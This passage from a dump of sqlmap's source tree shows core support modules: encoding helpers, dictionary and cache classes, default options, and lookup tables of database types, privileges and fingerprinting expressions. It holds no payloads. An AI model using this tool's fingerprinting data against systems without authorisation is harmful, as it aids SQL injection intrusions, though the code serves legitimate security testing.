\"\"\"\n\n    if value is None:\n        return None\n\n    if isinstance(value, six.text_type):\n        value = value.encode(encoding or UNICODE_ENCODING)\n\n    retVal = base64.b64encode(value)\n\n    if not binary:\n        retVal = getText(retVal, encoding)\n\n    if safe:\n        padding = False\n\n        # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications\n        # Reference: https://perldoc.perl.org/MIME/Base64.html\n        if isinstance(retVal, bytes):\n            retVal = retVal.replace(b'+', b'-').replace(b'/', b'_')\n        else:\n            retVal = retVal.replace('+', '-').replace('/', '_')\n\n    if not padding:\n        retVal = retVal.rstrip(b'=' if isinstance(retVal, bytes) else '=')\n\n    return retVal\n\ndef getBytes(value, encoding=None, errors=\"strict\", unsafe=True):\n    \"\"\"\n    Returns byte representation of provided Unicode value\n\n    >>> getBytes(u\"foo\\\\\\\\x01\\\\\\\\x83\\\\\\\\xffbar\") == b\"foo\\\\x01\\\\x83\\\\xffbar\"\n    True\n    \"\"\"\n\n    retVal = value\n\n    if encoding is None:\n        encoding = conf.get(\"encoding\") or UNICODE_ENCODING\n\n    try:\n        codecs.lookup(encoding)\n    except (LookupError, TypeError):\n        encoding = UNICODE_ENCODING\n\n    if isinstance(value, six.text_type):\n        if INVALID_UNICODE_PRIVATE_AREA:\n            if unsafe:\n                for char in xrange(0xF0000, 0xF00FF + 1):\n                    value = value.replace(_unichr(char), \"%s%02x\" % (SAFE_HEX_MARKER, char - 0xF0000))\n\n            retVal = value.encode(encoding, errors)\n\n            if unsafe:\n                retVal = re.sub(r\"%s([0-9a-f]{2})\" % SAFE_HEX_MARKER, lambda _: decodeHex(_.group(1)), retVal)\n        else:\n            try:\n                retVal = value.encode(encoding, errors)\n            except UnicodeError:\n                retVal = value.encode(UNICODE_ENCODING, errors=\"replace\")\n\n            if unsafe:\n                retVal = re.sub(b\"\\\\\\\\x([0-9a-f]{2})\", lambda _: decodeHex(_.group(1)), retVal)\n\n    return retVal\n\ndef getOrds(value):\n    \"\"\"\n    Returns ORD(...) representation of provided string value\n\n    >>> getOrds(u'fo\\\\xf6bar')\n    [102, 111, 246, 98, 97, 114]\n    >>> getOrds(b\"fo\\\\xc3\\\\xb6bar\")\n    [102, 111, 195, 182, 98, 97, 114]\n    \"\"\"\n\n    return [_ if isinstance(_, int) else ord(_) for _ in value]\n\ndef getUnicode(value, encoding=None, noneToNull=False):\n    \"\"\"\n    Returns the unicode representation of the supplied value\n\n    >>> getUnicode('test') == u'test'\n    True\n    >>> getUnicode(1) == u'1'\n    True\n    >>> getUnicode(None) == 'None'\n    True\n    \"\"\"\n\n    if noneToNull and value is None:\n        return NULL\n\n    if isinstance(value, six.text_type):\n        return value\n    elif isinstance(value, six.binary_type):\n        # Heuristics (if encoding not explicitly specified)\n        candidates = filterNone((encoding, kb.get(\"pageEncoding\") if kb.get(\"originalPage\") else None, conf.get(\"encoding\"), UNICODE_ENCODING, sys.getfilesystemencoding()))\n        if all(_ in value for _ in (b'<', b'>')):\n            pass\n        elif any(_ in value for _ in (b\":\\\\\", b'/', b'.')) and b'\\n' not in value:\n            candidates = filterNone((encoding, sys.getfilesystemencoding(), kb.get(\"pageEncoding\") if kb.get(\"originalPage\") else None, UNICODE_ENCODING, conf.get(\"encoding\")))\n        elif conf.get(\"encoding\") and b'\\n' not in value:\n            candidates = filterNone((encoding, conf.get(\"encoding\"), kb.get(\"pageEncoding\") if kb.get(\"originalPage\") else None, sys.getfilesystemencoding(), UNICODE_ENCODING))\n\n        for candidate in candidates:\n            try:\n                return six.text_type(value, candidate)\n            except (UnicodeDecodeError, LookupError):\n                pass\n\n        try:\n            return six.text_type(value, encoding or (kb.get(\"pageEncoding\") if kb.get(\"originalPage\") else None) or UNICODE_ENCODING)\n        except UnicodeDecodeError:\n            return six.text_type(value, UNICODE_ENCODING, errors=\"reversible\")\n    elif isListLike(value):\n        value = list(getUnicode(_, encoding, noneToNull) for _ in value)\n        return value\n    else:\n        try:\n            return six.text_type(value)\n        except UnicodeDecodeError:\n            return six.text_type(str(value), errors=\"ignore\")  # encoding ignored for non-basestring instances\n\ndef getText(value, encoding=None):\n    \"\"\"\n    Returns textual value of a given value (Note: not necessary Unicode on Python2)\n\n    >>> getText(b\"foobar\")\n    'foobar'\n    >>> isinstance(getText(u\"fo\\\\u2299bar\"), six.text_type)\n    True\n    \"\"\"\n\n    retVal = value\n\n    if isinstance(value, six.binary_type):\n        retVal = getUnicode(value, encoding)\n\n    if six.PY2:\n        try:\n            retVal = str(retVal)\n        except:\n            pass\n\n    return retVal\n\ndef stdoutEncode(value):\n    \"\"\"\n    Returns binary representation of a given Unicode value safe for writing to stdout\n    \"\"\"\n\n    value = value or \"\"\n\n    if IS_WIN and IS_TTY and kb.get(\"codePage\", -1) is None:\n        output = shellExec(\"chcp\")\n        match = re.search(r\": (\\d{3,})\", output or \"\")\n\n        if match:\n            try:\n                candidate = \"cp%s\" % match.group(1)\n                codecs.lookup(candidate)\n            except LookupError:\n                pass\n            else:\n                kb.codePage = candidate\n\n        kb.codePage = kb.codePage or \"\"\n\n    if isinstance(value, six.text_type):\n        encoding = kb.get(\"codePage\") or getattr(sys.stdout, \"encoding\", None) or UNICODE_ENCODING\n\n        while True:\n            try:\n                retVal = value.encode(encoding)\n                break\n            except UnicodeEncodeError as ex:\n                value = value[:ex.start] + \"?\" * (ex.end - ex.start) + value[ex.end:]\n\n                warnMsg = \"cannot properly display (some) Unicode characters \"\n                warnMsg += \"inside your terminal ('%s') environment. All \" % encoding\n                warnMsg += \"unhandled occurrences will result in \"\n                warnMsg += \"replacement with '?' character. Please, find \"\n                warnMsg += \"proper character representation inside \"\n                warnMsg += \"corresponding output files\"\n                singleTimeWarnMessage(warnMsg)\n\n        if six.PY3:\n            retVal = getUnicode(retVal, encoding)\n\n    else:\n        retVal = value\n\n    return retVal\n\ndef getConsoleLength(value):\n    \"\"\"\n    Returns console width of unicode values\n\n    >>> getConsoleLength(\"abc\")\n    3\n    >>> getConsoleLength(u\"\\\\u957f\\\\u6c5f\")\n    4\n    \"\"\"\n\n    if isinstance(value, six.text_type):\n        retVal = sum((2 if ord(_) >= 0x3000 else 1) for _ in value)\n    else:\n        retVal = len(value)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/lib/core/data.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.datatype import AttribDict\nfrom lib.core.log import LOGGER\n\n# sqlmap paths\npaths = AttribDict()\n\n# object to store original command line options\ncmdLineOptions = AttribDict()\n\n# object to store merged options (command line, configuration file and default options)\nmergedOptions = AttribDict()\n\n# object to share within function and classes command\n# line options and settings\nconf = AttribDict()\n\n# object to share within function and classes results\nkb = AttribDict()\n\n# object with each database management system specific queries\nqueries = {}\n\n# logger\nlogger = LOGGER\n"
  },
  {
    "path": "sqlmap/lib/core/datatype.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport copy\nimport types\n\nfrom thirdparty.odict import OrderedDict\nfrom thirdparty.six.moves import collections_abc as _collections\n\nclass AttribDict(dict):\n    \"\"\"\n    This class defines the dictionary with added capability to access members as attributes\n\n    >>> foo = AttribDict()\n    >>> foo.bar = 1\n    >>> foo.bar\n    1\n    \"\"\"\n\n    def __init__(self, indict=None, attribute=None, keycheck=True):\n        if indict is None:\n            indict = {}\n\n        # Set any attributes here - before initialisation\n        # these remain as normal attributes\n        self.attribute = attribute\n        self.keycheck = keycheck\n        dict.__init__(self, indict)\n        self.__initialised = True\n\n        # After initialisation, setting attributes\n        # is the same as setting an item\n\n    def __getattr__(self, item):\n        \"\"\"\n        Maps values to attributes\n        Only called if there *is NOT* an attribute with this name\n        \"\"\"\n\n        try:\n            return self.__getitem__(item)\n        except KeyError:\n            if self.keycheck:\n                raise AttributeError(\"unable to access item '%s'\" % item)\n            else:\n                return None\n\n    def __setattr__(self, item, value):\n        \"\"\"\n        Maps attributes to values\n        Only if we are initialised\n        \"\"\"\n\n        # This test allows attributes to be set in the __init__ method\n        if \"_AttribDict__initialised\" not in self.__dict__:\n            return dict.__setattr__(self, item, value)\n\n        # Any normal attributes are handled normally\n        elif item in self.__dict__:\n            dict.__setattr__(self, item, value)\n\n        else:\n            self.__setitem__(item, value)\n\n    def __getstate__(self):\n        return self.__dict__\n\n    def __setstate__(self, dict):\n        self.__dict__ = dict\n\n    def __deepcopy__(self, memo):\n        retVal = self.__class__()\n        memo[id(self)] = retVal\n\n        for attr in dir(self):\n            if not attr.startswith('_'):\n                value = getattr(self, attr)\n                if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):\n                    setattr(retVal, attr, copy.deepcopy(value, memo))\n\n        for key, value in self.items():\n            retVal.__setitem__(key, copy.deepcopy(value, memo))\n\n        return retVal\n\nclass InjectionDict(AttribDict):\n    def __init__(self):\n        AttribDict.__init__(self)\n\n        self.place = None\n        self.parameter = None\n        self.ptype = None\n        self.prefix = None\n        self.suffix = None\n        self.clause = None\n        self.notes = []  # Note: https://github.com/sqlmapproject/sqlmap/issues/1888\n\n        # data is a dict with various stype, each which is a dict with\n        # all the information specific for that stype\n        self.data = AttribDict()\n\n        # conf is a dict which stores current snapshot of important\n        # options used during detection\n        self.conf = AttribDict()\n\n        self.dbms = None\n        self.dbms_version = None\n        self.os = None\n\n# Reference: https://www.kunxi.org/2014/05/lru-cache-in-python\nclass LRUDict(object):\n    \"\"\"\n    This class defines the LRU dictionary\n\n    >>> foo = LRUDict(capacity=2)\n    >>> foo[\"first\"] = 1\n    >>> foo[\"second\"] = 2\n    >>> foo[\"third\"] = 3\n    >>> \"first\" in foo\n    False\n    >>> \"third\" in foo\n    True\n    \"\"\"\n\n    def __init__(self, capacity):\n        self.capacity = capacity\n        self.cache = OrderedDict()\n\n    def __len__(self):\n        return len(self.cache)\n\n    def __contains__(self, key):\n        return key in self.cache\n\n    def __getitem__(self, key):\n        value = self.cache.pop(key)\n        self.cache[key] = value\n        return value\n\n    def get(self, key):\n        return self.__getitem__(key)\n\n    def __setitem__(self, key, value):\n        try:\n            self.cache.pop(key)\n        except KeyError:\n            if len(self.cache) >= self.capacity:\n                self.cache.popitem(last=False)\n        self.cache[key] = value\n\n    def set(self, key, value):\n        self.__setitem__(key, value)\n\n    def keys(self):\n        return self.cache.keys()\n\n# Reference: https://code.activestate.com/recipes/576694/\nclass OrderedSet(_collections.MutableSet):\n    \"\"\"\n    This class defines the set with ordered (as added) items\n\n    >>> foo = OrderedSet()\n    >>> foo.add(1)\n    >>> foo.add(2)\n    >>> foo.add(3)\n    >>> foo.pop()\n    3\n    >>> foo.pop()\n    2\n    >>> foo.pop()\n    1\n    \"\"\"\n\n    def __init__(self, iterable=None):\n        self.end = end = []\n        end += [None, end, end]         # sentinel node for doubly linked list\n        self.map = {}                   # key --> [key, prev, next]\n        if iterable is not None:\n            self |= iterable\n\n    def __len__(self):\n        return len(self.map)\n\n    def __contains__(self, key):\n        return key in self.map\n\n    def add(self, value):\n        if value not in self.map:\n            end = self.end\n            curr = end[1]\n            curr[2] = end[1] = self.map[value] = [value, curr, end]\n\n    def discard(self, value):\n        if value in self.map:\n            value, prev, next = self.map.pop(value)\n            prev[2] = next\n            next[1] = prev\n\n    def __iter__(self):\n        end = self.end\n        curr = end[2]\n        while curr is not end:\n            yield curr[0]\n            curr = curr[2]\n\n    def __reversed__(self):\n        end = self.end\n        curr = end[1]\n        while curr is not end:\n            yield curr[0]\n            curr = curr[1]\n\n    def pop(self, last=True):\n        if not self:\n            raise KeyError('set is empty')\n        key = self.end[1][0] if last else self.end[2][0]\n        self.discard(key)\n        return key\n\n    def __repr__(self):\n        if not self:\n            return '%s()' % (self.__class__.__name__,)\n        return '%s(%r)' % (self.__class__.__name__, list(self))\n\n    def __eq__(self, other):\n        if isinstance(other, OrderedSet):\n            return len(self) == len(other) and list(self) == list(other)\n        return set(self) == set(other)\n"
  },
  {
    "path": "sqlmap/lib/core/decorators.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport functools\nimport hashlib\nimport threading\n\nfrom lib.core.datatype import LRUDict\nfrom lib.core.settings import MAX_CACHE_ITEMS\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.threads import getCurrentThreadData\n\n_cache = {}\n_cache_lock = threading.Lock()\n_method_locks = {}\n\ndef cachedmethod(f):\n    \"\"\"\n    Method with a cached content\n\n    >>> __ = cachedmethod(lambda _: _)\n    >>> __(1)\n    1\n    >>> __(1)\n    1\n    >>> __ = cachedmethod(lambda *args, **kwargs: args[0])\n    >>> __(2)\n    2\n    >>> __ = cachedmethod(lambda *args, **kwargs: next(iter(kwargs.values())))\n    >>> __(foobar=3)\n    3\n\n    Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/\n    \"\"\"\n\n    _cache[f] = LRUDict(capacity=MAX_CACHE_ITEMS)\n\n    @functools.wraps(f)\n    def _f(*args, **kwargs):\n        try:\n            key = int(hashlib.md5(\"|\".join(str(_) for _ in (f, args, kwargs)).encode(UNICODE_ENCODING)).hexdigest(), 16) & 0x7fffffffffffffff\n        except ValueError:  # https://github.com/sqlmapproject/sqlmap/issues/4281 (NOTE: non-standard Python behavior where hexdigest returns binary value)\n            result = f(*args, **kwargs)\n        else:\n            try:\n                with _cache_lock:\n                    result = _cache[f][key]\n            except KeyError:\n                result = f(*args, **kwargs)\n\n                with _cache_lock:\n                    _cache[f][key] = result\n\n        return result\n\n    return _f\n\ndef stackedmethod(f):\n    \"\"\"\n    Method using pushValue/popValue functions (fallback function for stack realignment)\n\n    >>> threadData = getCurrentThreadData()\n    >>> original = len(threadData.valueStack)\n    >>> __ = stackedmethod(lambda _: threadData.valueStack.append(_))\n    >>> __(1)\n    >>> len(threadData.valueStack) == original\n    True\n    \"\"\"\n\n    @functools.wraps(f)\n    def _(*args, **kwargs):\n        threadData = getCurrentThreadData()\n        originalLevel = len(threadData.valueStack)\n\n        try:\n            result = f(*args, **kwargs)\n        finally:\n            if len(threadData.valueStack) > originalLevel:\n                threadData.valueStack = threadData.valueStack[:originalLevel]\n\n        return result\n\n    return _\n\ndef lockedmethod(f):\n    @functools.wraps(f)\n    def _(*args, **kwargs):\n        if f not in _method_locks:\n            _method_locks[f] = threading.RLock()\n\n        with _method_locks[f]:\n            result = f(*args, **kwargs)\n\n        return result\n\n    return _\n"
  },
  {
    "path": "sqlmap/lib/core/defaults.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.datatype import AttribDict\n\n_defaults = {\n    \"csvDel\": ',',\n    \"timeSec\": 5,\n    \"googlePage\": 1,\n    \"verbose\": 1,\n    \"delay\": 0,\n    \"timeout\": 30,\n    \"retries\": 3,\n    \"csrfRetries\": 0,\n    \"safeFreq\": 0,\n    \"threads\": 1,\n    \"level\": 1,\n    \"risk\": 1,\n    \"dumpFormat\": \"CSV\",\n    \"tablePrefix\": \"sqlmap\",\n    \"technique\": \"BEUSTQ\",\n    \"torType\": \"SOCKS5\",\n}\n\ndefaults = AttribDict(_defaults)\n"
  },
  {
    "path": "sqlmap/lib/core/dicts.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import CONTENT_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import OS\nfrom lib.core.enums import POST_HINT\nfrom lib.core.settings import ACCESS_ALIASES\nfrom lib.core.settings import ALTIBASE_ALIASES\nfrom lib.core.settings import BLANK\nfrom lib.core.settings import CACHE_ALIASES\nfrom lib.core.settings import CRATEDB_ALIASES\nfrom lib.core.settings import CUBRID_ALIASES\nfrom lib.core.settings import DB2_ALIASES\nfrom lib.core.settings import DERBY_ALIASES\nfrom lib.core.settings import EXTREMEDB_ALIASES\nfrom lib.core.settings import FIREBIRD_ALIASES\nfrom lib.core.settings import FRONTBASE_ALIASES\nfrom lib.core.settings import H2_ALIASES\nfrom lib.core.settings import HSQLDB_ALIASES\nfrom lib.core.settings import INFORMIX_ALIASES\nfrom lib.core.settings import MAXDB_ALIASES\nfrom lib.core.settings import MCKOI_ALIASES\nfrom lib.core.settings import MIMERSQL_ALIASES\nfrom lib.core.settings import MONETDB_ALIASES\nfrom lib.core.settings import MSSQL_ALIASES\nfrom lib.core.settings import MYSQL_ALIASES\nfrom lib.core.settings import NULL\nfrom lib.core.settings import ORACLE_ALIASES\nfrom lib.core.settings import PGSQL_ALIASES\nfrom lib.core.settings import PRESTO_ALIASES\nfrom lib.core.settings import RAIMA_ALIASES\nfrom lib.core.settings import SQLITE_ALIASES\nfrom lib.core.settings import SYBASE_ALIASES\nfrom lib.core.settings import VERTICA_ALIASES\nfrom lib.core.settings import VIRTUOSO_ALIASES\n\nFIREBIRD_TYPES = {\n    261: \"BLOB\",\n    14: \"CHAR\",\n    40: \"CSTRING\",\n    11: \"D_FLOAT\",\n    27: \"DOUBLE\",\n    10: \"FLOAT\",\n    16: \"INT64\",\n    8: \"INTEGER\",\n    9: \"QUAD\",\n    7: \"SMALLINT\",\n    12: \"DATE\",\n    13: \"TIME\",\n    35: \"TIMESTAMP\",\n    37: \"VARCHAR\",\n}\n\nINFORMIX_TYPES = {\n    0: \"CHAR\",\n    1: \"SMALLINT\",\n    2: \"INTEGER\",\n    3: \"FLOAT\",\n    4: \"SMALLFLOAT\",\n    5: \"DECIMAL\",\n    6: \"SERIAL\",\n    7: \"DATE\",\n    8: \"MONEY\",\n    9: \"NULL\",\n    10: \"DATETIME\",\n    11: \"BYTE\",\n    12: \"TEXT\",\n    13: \"VARCHAR\",\n    14: \"INTERVAL\",\n    15: \"NCHAR\",\n    16: \"NVARCHAR\",\n    17: \"INT8\",\n    18: \"SERIAL8\",\n    19: \"SET\",\n    20: \"MULTISET\",\n    21: \"LIST\",\n    22: \"ROW (unnamed)\",\n    23: \"COLLECTION\",\n    40: \"Variable-length opaque type\",\n    41: \"Fixed-length opaque type\",\n    43: \"LVARCHAR\",\n    45: \"BOOLEAN\",\n    52: \"BIGINT\",\n    53: \"BIGSERIAL\",\n    2061: \"IDSSECURITYLABEL\",\n    4118: \"ROW (named)\",\n}\n\nSYBASE_TYPES = {\n    14: \"floatn\",\n    8: \"float\",\n    15: \"datetimn\",\n    12: \"datetime\",\n    23: \"real\",\n    28: \"numericn\",\n    10: \"numeric\",\n    27: \"decimaln\",\n    26: \"decimal\",\n    17: \"moneyn\",\n    11: \"money\",\n    21: \"smallmoney\",\n    22: \"smalldatetime\",\n    13: \"intn\",\n    7: \"int\",\n    6: \"smallint\",\n    5: \"tinyint\",\n    16: \"bit\",\n    2: \"varchar\",\n    18: \"sysname\",\n    25: \"nvarchar\",\n    1: \"char\",\n    24: \"nchar\",\n    4: \"varbinary\",\n    80: \"timestamp\",\n    3: \"binary\",\n    19: \"text\",\n    20: \"image\",\n}\n\nALTIBASE_TYPES = {\n    1: \"CHAR\",\n    12: \"VARCHAR\",\n    -8: \"NCHAR\",\n    -9: \"NVARCHAR\",\n    2: \"NUMERIC\",\n    6: \"FLOAT\",\n    8: \"DOUBLE\",\n    7: \"REAL\",\n    -5: \"BIGINT\",\n    4: \"INTEGER\",\n    5: \"SMALLINT\",\n    9: \"DATE\",\n    30: \"BLOB\",\n    40: \"CLOB\",\n    20001: \"BYTE\",\n    20002: \"NIBBLE\",\n    -7: \"BIT\",\n    -100: \"VARBIT\",\n    10003: \"GEOMETRY\",\n}\n\nMYSQL_PRIVS = {\n    1: \"select_priv\",\n    2: \"insert_priv\",\n    3: \"update_priv\",\n    4: \"delete_priv\",\n    5: \"create_priv\",\n    6: \"drop_priv\",\n    7: \"reload_priv\",\n    8: \"shutdown_priv\",\n    9: \"process_priv\",\n    10: \"file_priv\",\n    11: \"grant_priv\",\n    12: \"references_priv\",\n    13: \"index_priv\",\n    14: \"alter_priv\",\n    15: \"show_db_priv\",\n    16: \"super_priv\",\n    17: \"create_tmp_table_priv\",\n    18: \"lock_tables_priv\",\n    19: \"execute_priv\",\n    20: \"repl_slave_priv\",\n    21: \"repl_client_priv\",\n    22: \"create_view_priv\",\n    23: \"show_view_priv\",\n    24: \"create_routine_priv\",\n    25: \"alter_routine_priv\",\n    26: \"create_user_priv\",\n}\n\nPGSQL_PRIVS = {\n    1: \"createdb\",\n    2: \"super\",\n    3: \"catupd\",\n}\n\n# Reference(s): http://stackoverflow.com/a/17672504\n#               http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES\n\nFIREBIRD_PRIVS = {\n    \"S\": \"SELECT\",\n    \"I\": \"INSERT\",\n    \"U\": \"UPDATE\",\n    \"D\": \"DELETE\",\n    \"R\": \"REFERENCE\",\n    \"X\": \"EXECUTE\",\n    \"A\": \"ALL\",\n    \"M\": \"MEMBER\",\n    \"T\": \"DECRYPT\",\n    \"E\": \"ENCRYPT\",\n    \"B\": \"SUBSCRIBE\",\n}\n\n# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm\n#               https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm\n\nINFORMIX_PRIVS = {\n    \"D\": \"DBA (all privileges)\",\n    \"R\": \"RESOURCE (create UDRs, UDTs, permanent tables and indexes)\",\n    \"C\": \"CONNECT (work with existing tables)\",\n    \"G\": \"ROLE\",\n    \"U\": \"DEFAULT (implicit connection)\",\n}\n\nDB2_PRIVS = {\n    1: \"CONTROLAUTH\",\n    2: \"ALTERAUTH\",\n    3: \"DELETEAUTH\",\n    4: \"INDEXAUTH\",\n    5: \"INSERTAUTH\",\n    6: \"REFAUTH\",\n    7: \"SELECTAUTH\",\n    8: \"UPDATEAUTH\",\n}\n\nDUMP_REPLACEMENTS = {\" \": NULL, \"\": BLANK}\n\nDBMS_DICT = {\n    DBMS.MSSQL: (MSSQL_ALIASES, \"python-pymssql\", \"https://github.com/pymssql/pymssql\", \"mssql+pymssql\"),\n    DBMS.MYSQL: (MYSQL_ALIASES, \"python-pymysql\", \"https://github.com/PyMySQL/PyMySQL\", \"mysql\"),\n    DBMS.PGSQL: (PGSQL_ALIASES, \"python-psycopg2\", \"https://github.com/psycopg/psycopg2\", \"postgresql\"),\n    DBMS.ORACLE: (ORACLE_ALIASES, \"python cx_Oracle\", \"https://oracle.github.io/python-cx_Oracle/\", \"oracle\"),\n    DBMS.SQLITE: (SQLITE_ALIASES, \"python-sqlite\", \"https://docs.python.org/3/library/sqlite3.html\", \"sqlite\"),\n    DBMS.ACCESS: (ACCESS_ALIASES, \"python-pyodbc\", \"https://github.com/mkleehammer/pyodbc\", \"access\"),\n    DBMS.FIREBIRD: (FIREBIRD_ALIASES, \"python-kinterbasdb\", \"http://kinterbasdb.sourceforge.net/\", \"firebird\"),\n    DBMS.MAXDB: (MAXDB_ALIASES, None, None, \"maxdb\"),\n    DBMS.SYBASE: (SYBASE_ALIASES, \"python-pymssql\", \"https://github.com/pymssql/pymssql\", \"sybase\"),\n    DBMS.DB2: (DB2_ALIASES, \"python ibm-db\", \"https://github.com/ibmdb/python-ibmdb\", \"ibm_db_sa\"),\n    DBMS.HSQLDB: (HSQLDB_ALIASES, \"python jaydebeapi & python-jpype\", \"https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype\", None),\n    DBMS.H2: (H2_ALIASES, None, None, None),\n    DBMS.INFORMIX: (INFORMIX_ALIASES, \"python ibm-db\", \"https://github.com/ibmdb/python-ibmdb\", \"ibm_db_sa\"),\n    DBMS.MONETDB: (MONETDB_ALIASES, \"pymonetdb\", \"https://github.com/gijzelaerr/pymonetdb\", \"monetdb\"),\n    DBMS.DERBY: (DERBY_ALIASES, \"pydrda\", \"https://github.com/nakagami/pydrda/\", None),\n    DBMS.VERTICA: (VERTICA_ALIASES, \"vertica-python\", \"https://github.com/vertica/vertica-python\", \"vertica+vertica_python\"),\n    DBMS.MCKOI: (MCKOI_ALIASES, None, None, None),\n    DBMS.PRESTO: (PRESTO_ALIASES, \"presto-python-client\", \"https://github.com/prestodb/presto-python-client\", None),\n    DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None),\n    DBMS.MIMERSQL: (MIMERSQL_ALIASES, \"mimerpy\", \"https://github.com/mimersql/MimerPy\", None),\n    DBMS.CRATEDB: (CRATEDB_ALIASES, \"python-psycopg2\", \"https://github.com/psycopg/psycopg2\", \"postgresql\"),\n    DBMS.CUBRID: (CUBRID_ALIASES, \"CUBRID-Python\", \"https://github.com/CUBRID/cubrid-python\", None),\n    DBMS.CACHE: (CACHE_ALIASES, \"python jaydebeapi & python-jpype\", \"https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype\", None),\n    DBMS.EXTREMEDB: (EXTREMEDB_ALIASES, None, None, None),\n    DBMS.FRONTBASE: (FRONTBASE_ALIASES, None, None, None),\n    DBMS.RAIMA: (RAIMA_ALIASES, None, None, None),\n    DBMS.VIRTUOSO: (VIRTUOSO_ALIASES, None, None, None),\n}\n\n# Reference: https://blog.jooq.org/tag/sysibm-sysdummy1/\nFROM_DUMMY_TABLE = {\n    DBMS.ORACLE: \" FROM DUAL\",\n    DBMS.ACCESS: \" FROM MSysAccessObjects\",\n    DBMS.FIREBIRD: \" FROM RDB$DATABASE\",\n    DBMS.MAXDB: \" FROM VERSIONS\",\n    DBMS.DB2: \" FROM SYSIBM.SYSDUMMY1\",\n    DBMS.HSQLDB: \" FROM INFORMATION_SCHEMA.SYSTEM_USERS\",\n    DBMS.INFORMIX: \" FROM SYSMASTER:SYSDUAL\",\n    DBMS.DERBY: \" FROM SYSIBM.SYSDUMMY1\",\n    DBMS.MIMERSQL: \" FROM SYSTEM.ONEROW\",\n    DBMS.FRONTBASE: \" FROM INFORMATION_SCHEMA.IO_STATISTICS\"\n}\n\nHEURISTIC_NULL_EVAL = {\n    DBMS.ACCESS: \"CVAR(NULL)\",\n    DBMS.MAXDB: \"ALPHA(NULL)\",\n    DBMS.MSSQL: \"DIFFERENCE(NULL,NULL)\",\n    DBMS.MYSQL: \"QUARTER(NULL)\",\n    DBMS.ORACLE: \"INSTR2(NULL,NULL)\",\n    DBMS.PGSQL: \"QUOTE_IDENT(NULL)\",\n    DBMS.SQLITE: \"UNLIKELY(NULL)\",\n    DBMS.H2: \"STRINGTOUTF8(NULL)\",\n    DBMS.MONETDB: \"CODE(NULL)\",\n    DBMS.DERBY: \"NULLIF(USER,SESSION_USER)\",\n    DBMS.VERTICA: \"BITSTRING_TO_BINARY(NULL)\",\n    DBMS.MCKOI: \"TONUMBER(NULL)\",\n    DBMS.PRESTO: \"FROM_HEX(NULL)\",\n    DBMS.ALTIBASE: \"TDESENCRYPT(NULL,NULL)\",\n    DBMS.MIMERSQL: \"ASCII_CHAR(256)\",\n    DBMS.CRATEDB: \"MD5(NULL~NULL)\",  # Note: NULL~NULL also being evaluated on H2 and Ignite\n    DBMS.CUBRID: \"(NULL SETEQ NULL)\",\n    DBMS.CACHE: \"%SQLUPPER NULL\",\n    DBMS.EXTREMEDB: \"NULLIFZERO(hashcode(NULL))\",\n    DBMS.RAIMA: \"IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))\",\n    DBMS.VIRTUOSO: \"__MAX_NOTNULL(NULL)\",\n}\n\nSQL_STATEMENTS = {\n    \"SQL SELECT statement\": (\n        \"select \",\n        \"show \",\n        \" top \",\n        \" distinct \",\n        \" from \",\n        \" from dual\",\n        \" where \",\n        \" group by \",\n        \" order by \",\n        \" having \",\n        \" limit \",\n        \" offset \",\n        \" union all \",\n        \" rownum as \",\n        \"(case \",\n    ),\n\n    \"SQL data definition\": (\n        \"create \",\n        \"declare \",\n        \"drop \",\n        \"truncate \",\n        \"alter \",\n    ),\n\n    \"SQL data manipulation\": (\n        \"bulk \",\n        \"insert \",\n        \"update \",\n        \"delete \",\n        \"merge \",\n        \"load \",\n    ),\n\n    \"SQL data control\": (\n        \"grant \",\n        \"revoke \",\n    ),\n\n    \"SQL data execution\": (\n        \"exec \",\n        \"execute \",\n        \"values \",\n        \"call \",\n    ),\n\n    \"SQL transaction\": (\n        \"start transaction \",\n        \"begin work \",\n        \"begin transaction \",\n        \"commit \",\n        \"rollback \",\n    ),\n\n    \"SQL administration\": (\n        \"set \",\n    ),\n}\n\nPOST_HINT_CONTENT_TYPES = {\n    POST_HINT.JSON: \"application/json\",\n    POST_HINT.JSON_LIKE: \"application/json\",\n    POST_HINT.MULTIPART: \"multipart/form-data\",\n    POST_HINT.SOAP: \"application/soap+xml\",\n    POST_HINT.XML: \"application/xml\",\n    POST_HINT.ARRAY_LIKE: \"application/x-www-form-urlencoded; charset=utf-8\",\n}\n\nOBSOLETE_OPTIONS = {\n    \"--replicate\": \"use '--dump-format=SQLITE' instead\",\n    \"--no-unescape\": \"use '--no-escape' instead\",\n    \"--binary\": \"use '--binary-fields' instead\",\n    \"--auth-private\": \"use '--auth-file' instead\",\n    \"--ignore-401\": \"use '--ignore-code' instead\",\n    \"--second-order\": \"use '--second-url' instead\",\n    \"--purge-output\": \"use '--purge' instead\",\n    \"--sqlmap-shell\": \"use '--shell' instead\",\n    \"--check-payload\": None,\n    